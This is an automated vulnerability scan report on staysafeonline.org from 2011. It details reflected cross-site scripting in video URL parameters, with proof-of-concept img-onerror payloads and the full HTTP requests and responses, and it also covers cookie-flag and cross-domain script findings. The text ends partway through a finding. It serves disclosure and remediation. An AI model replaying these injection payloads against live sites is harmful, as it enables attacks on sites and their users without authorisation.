XSS, Cross Site Scripting, CWE-79, CAPEC-86, www.staysafeonline.org CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Report generated by XSS.CX at Sun Apr 17 09:19:32 CDT 2011.
XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.
XSS.CX Home |
XSS.CX Research Blog
Loading
1. Cross-site scripting (reflected)
1.1. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 4]
1.2. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 5]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
4. Cross-domain script include
4.1. http://www.staysafeonline.org/
4.2. http://www.staysafeonline.org/blog
4.3. http://www.staysafeonline.org/contact
4.4. http://www.staysafeonline.org/cybersecurity-awareness-month/get-involved
4.5. http://www.staysafeonline.org/favicon.ico
4.6. http://www.staysafeonline.org/for-business
4.7. http://www.staysafeonline.org/for-business/best-practices
4.8. http://www.staysafeonline.org/for-business/gain-their-trust
4.9. http://www.staysafeonline.org/for-business/protect-your-customers
4.10. http://www.staysafeonline.org/for-business/resources-smallmed-sized-businesses
4.11. http://www.staysafeonline.org/for-higher-education
4.12. http://www.staysafeonline.org/higher-education/higher-ed-campaign-university-partners
4.13. http://www.staysafeonline.org/higher-education/higher-education-campaign
4.14. http://www.staysafeonline.org/in-the-home/fixing-problems
4.15. http://www.staysafeonline.org/tools-resources/free-security-check-ups
4.16. http://www.staysafeonline.org/tools-resources/staysafeonline-videos
5. Email addresses disclosed
5.1. http://www.staysafeonline.org/sites/all/modules/pngfix/jquery.pngFix.js
5.2. http://www.staysafeonline.org/sites/default/files/js/js_117b5c4dbad9c4374f2f70f767f163d8.js
5.3. http://www.staysafeonline.org/sites/default/files/js/js_405a934312f7bcf547c4008cf17e9f27.js
5.4. http://www.staysafeonline.org/sites/default/files/js/js_5c7c317e356a065b00eee58962cae056.js
5.5. http://www.staysafeonline.org/sites/default/files/js/js_e80058fd44eacbfe509d9a44aee06465.js
6. Credit card numbers disclosed
6.1. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Businesses%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.2. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20College%20Admins%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.3. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20College%20Students%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.4. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Educators%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.5. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Home%20Users%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.6. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Libraries%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.7. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Local%20Government%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
6.8. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Local%20Law%20Enforcement%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
7. Robots.txt file
8. Content type incorrectly stated
8.1. http://www.staysafeonline.org/photos/get/photos/807
8.2. http://www.staysafeonline.org/photos/get/photos/809
8.3. http://www.staysafeonline.org/photos/get/photos/843
8.4. http://www.staysafeonline.org/photos/get/photos/964
1. Cross-site scripting (reflected)
next
There are 2 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 4]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c was submitted in the REST URL parameter 4. This input was echoed as b97eb"><img src=a onerror=alert(1)>f6a4e450b1c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /emvideo/modal/975/425b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c /350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:00:39 GMT Server: Apache Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 13:00:39 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 2506 Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> ...[SNIP]... <embed src="/custom-video/1-15-high.mp4" width="425b97eb"><img src=a onerror=alert(1)>f6a4e450b1c " height="350" autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">...[SNIP]...
1.2. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b was submitted in the REST URL parameter 5. This input was echoed as e90ef"><img src=a onerror=alert(1)>ff5fd031a2b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /emvideo/modal/975/425/350e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b /field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:00:49 GMT Server: Apache Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 13:00:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 2506 Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> ...[SNIP]... <embed src="/custom-video/1-15-high.mp4" width="425" height="350e90ef"><img src=a onerror=alert(1)>ff5fd031a2b " autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">...[SNIP]...
2. Cookie scoped to parent domain
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SESS6f57b259b59a3e27ce4de09126b9e41f=7813e334028f6712df911e85a42e550f; expires=Tue, 10 May 2011 16:26:30 GMT; path=/; domain=.staysafeonline.org The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
Request
GET / HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:10 GMT Server: ApacheSet-Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=7813e334028f6712df911e85a42e550f; expires=Tue, 10 May 2011 16:26:30 GMT; path=/; domain=.staysafeonline.org Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 12:53:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 50242 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]...
3. Cookie without HttpOnly flag set
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SESS6f57b259b59a3e27ce4de09126b9e41f=7813e334028f6712df911e85a42e550f; expires=Tue, 10 May 2011 16:26:30 GMT; path=/; domain=.staysafeonline.org The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
Request
GET / HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:10 GMT Server: ApacheSet-Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=7813e334028f6712df911e85a42e550f; expires=Tue, 10 May 2011 16:26:30 GMT; path=/; domain=.staysafeonline.org Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 12:53:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 50242 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]...
4. Cross-domain script include
previous
next
There are 16 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
4.1. http://www.staysafeonline.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET / HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:10 GMT Server: Apache Set-Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=7813e334028f6712df911e85a42e550f; expires=Tue, 10 May 2011 16:26:30 GMT; path=/; domain=.staysafeonline.org Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 12:53:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 50242 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.2. http://www.staysafeonline.org/blog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/blog
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /blog HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.2.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:45 GMT Server: Apache Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 12:53:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 55361 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.3. http://www.staysafeonline.org/contact
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/contact
Issue detail
The response dynamically includes the following scripts from other domains:http://api.recaptcha.net/challenge?k=6LeKGAgAAAAAANTbmR7Sqb7b9vsvU_nkruIHkLWe http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /contact HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.2.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:45 GMT Server: Apache Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 17 Apr 2011 12:53:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 29618 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <div class="form-item"> <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LeKGAgAAAAAANTbmR7Sqb7b9vsvU_nkruIHkLWe"> </script>...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.4. http://www.staysafeonline.org/cybersecurity-awareness-month/get-involved
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/cybersecurity-awareness-month/get-involved
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /cybersecurity-awareness-month/get-involved HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:22 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 08:23:49 GMT ETag: "c8665524128a8044abafe4549de93adc" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 35504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.5. http://www.staysafeonline.org/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/favicon.ico
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /favicon.ico HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.15.8.1303045041553
Response
HTTP/1.1 404 Not Found Date: Sun, 17 Apr 2011 12:57:24 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 07:11:09 GMT ETag: "a0389cc9f7ab14bb07df970480396572" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 27812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.6. http://www.staysafeonline.org/for-business
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-business
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /for-business HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:41 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:15 GMT ETag: "9b00ff68cf03129eae38f7b65d8a8548" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 36085 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.7. http://www.staysafeonline.org/for-business/best-practices
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-business/best-practices
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /for-business/best-practices HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/for-business/gain-their-trust User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.18.8.1303045041553
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:39 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:17 GMT ETag: "e0c0991768061ee7a18f951d525fe3b8" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 30385 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.8. http://www.staysafeonline.org/for-business/gain-their-trust
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-business/gain-their-trust
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
